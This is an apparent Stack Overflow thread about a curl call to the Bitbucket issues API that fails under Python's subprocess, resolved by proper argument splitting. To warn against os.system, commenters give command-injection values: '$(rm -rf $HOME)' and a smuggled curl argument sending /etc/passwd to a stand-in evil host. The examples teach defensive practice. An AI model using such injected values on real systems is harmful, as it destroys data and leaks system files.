# curl works fine, except if I call it with subprocess

Tags: python, curl, https

I have a curl that looks a bit like this:

```
curl -1 -X POST --user "xxx:yyy" -d "status=new&content=issue+details+at%3A+http%3A%2F%2Flocalhost%3A6543%2Ftest%2Fsubmit%2F16-07-03-H-20-18-&kind=bug&title=QA+Fail&responsible=xxx&priority=critical"  "https://api.bitbucket.org/1.0/repositories/my/repo/issues"
```

If I open up a terminal and just execute it it works fine (an issue is created in bitbucket)

if I try to execute the same curl via subprocess it just fails:

```
sCmd = "curl....etc"
lCmd = [s for s in sCmd.split() if s]
subprocess.call(lCmd)
```

I get the error message:

```
curl: (1) Protocol "https not supported or disabled in libcurl
```

I don't get why the exact same command works so differently in Python. Any ideas?

This is without use of a virtualenv, by the way. And I know for a fact that the contents of `lCmd` are valid

PS: yes, I know I should be using requests. Unfortunately requests was giving me similar problems.

Comment: What if you do `lCmd = shlex.split(sCmd)`?

Comment: Why would you use a string rather than an array literal anyhow? Passing the arguments pre-parsed gives you far more control.

Comment: Why not [Requests](http://docs.python-requests.org/en/master/)?

Comment: By the way, it's *extremely* unlikely that it's actually Python making the difference here. Look at whether the curl binary or the libcurl in the library path differ between your interactive and noninteractive environments.

Comment: @CharlesDuffy: the string is because I had one. The crux of the problem is the ssl part

Comment: @GingerPlusPlus: that was the first thing I tried. I resorted to more primitive methods because of other issues.

Comment: `[s for s in sCmd.split() if s]` is exactly equivalent to `sCmd.split()`.  The `.split()` method will never produce an empty string in its output (unless you pass it an argument…)

Answer (score 0, accepted):

If this is useful please upvote Andrae's answer, it set me on the right path.

looking at the error message:

```
curl: (1) Protocol "https not supported or disabled in libcurl
```

see `"https` is the problem, `https` on the other hand works fine.

The issue was that I thought I was supposed to enclose my argument strings in quotes.

So there are two easy ways to get around this:

```
lCmd = shlex.split(sCmd)
subprocess.call(lCmd)
```

or

```
import os
os.system(sCmd)
```

Comment: If this is the problem, then using my answer would also have avoided it, since using Python literals would have meant having no literal quote characters in your strings (the only quotes being _Python_ syntactic quotes, as opposed to literals intended to be interpreted as _shell_ syntactic quotes).

Comment: ...and see my comment on Andrei's answer re: the security issues inherent in using `os.system()` or any equivalent thereto.

Answer (score 2):

The only point of having a shell, in this scenario, is to split your string into a set of arguments.

Thing is, you don't need anything to do that for you -- you can do it more accurately and consistently yourself!

```
subprocess.call([
  'curl',
  '-1',
  '-X', 'POST', 
  '--user', 'xxx:yyy',
  '-d', 'status=new&content=issue+details+at%3A+http%3A%2F%2Flocalhost%3A6543%2Ftest%2Fsubmit%2F16-07-03-H-20-18-&kind=bug&title=QA+Fail&responsible=xxx&priority=critical',
  'https://api.bitbucket.org/1.0/repositories/my/repo/issues'
])
```

This also avoids confusion between literal and syntactic quotes: When specifying a literal argv, the literal Python string you pass is the literal string the child process receives -- there's no need for quoted quotes to be passed to the shell.

---

This is much more reliable than starting with a string and splitting it, even with Python builtins: Consider a case where your username contains whitespace. A list containing

```
'--user', 'user name:password'
```

...is completely unambiguous, whereas

```
--user user name:password
```

...will parse incorrectly.

Even worse would be a username containing `$(rm -rf $HOME)` -- if you use `os.system()` or `subprocess.Popen(..., shell=True)`, that username could be executed as a command; with a literal string, you're entirely safe.

---

That said -- the specific error, re: libcurl not being compiled with SSL support, isn't going to be calling-convention-specific. I'd suggest inspecting your environment -- if you have different versions of curl first in the PATH, or different versions of libcurl in LD_LIBRARY_PATH between your environments, that would explain the error in question.

Comment: Actually, from the answer you added, the split **is** the issue -- it's treating quotes literally whereas you intend them to be syntactic. Specifying each argv entry as a literal Python string means that the only syntactic quotes are Python quotes, not shell quotes, so you avoid the problem entirely.

Comment: ...the shell's field-splitting is preceded in the parsing process by quote removal (which, incidentally, happens *before* parameter expansion, which is why putting a command in a string and evaluating that string unquoted results in the same bug you reported here, albeit in shell rather than Python; see http://mywiki.wooledge.org/BashFAQ/050 for that variant). Here, you're doing the same thing folks running `$cmd` are -- doing string-splitting but not quote-removal -- and getting the same behavior as a result.

Comment: ...and the solution is the same in both places: If you read BashFAQ #50, folks trying to do the same thing in native shell are advised to use a shell array with literals for each argv entry, just as I'm advising you to do here in Python.

Answer (score 1):

I can't answer your question about using the `curl` command in `subprocess`, but it might work if you just call `os.system` Like this:

```
import os
os.system ("curl -1 -X POST --user \"xxx:yyy\" -d \"status=new&content=issue+details+at%3A+http%3A%2F%2Flocalhost%3A6543%2Ftest%2Fsubmit%2F16-07-03-H-20-18-&kind=bug&title=QA+Fail&responsible=xxx&priority=critical\"  \"https://api.bitbucket.org/1.0/repositories/my/repo/issues\"")
```

This most likely works knowing that `curl` runs via the terminal directly.

> This might help with your question about `curl` not running in subprocess (probably has something to do with the environment of subprocess being different then the environment that `curl` was configured): https://curl.haxx.se/docs/faq.html#curl_1_SSL_is_disabled_https

Comment: This works, but it's not ideal from a security perspective -- consider if you're constructing this string from a user who gives their password as `$(rm -rf $HOME)`, or as `yyy" --data @/etc/passwd http://my.evil.site #`.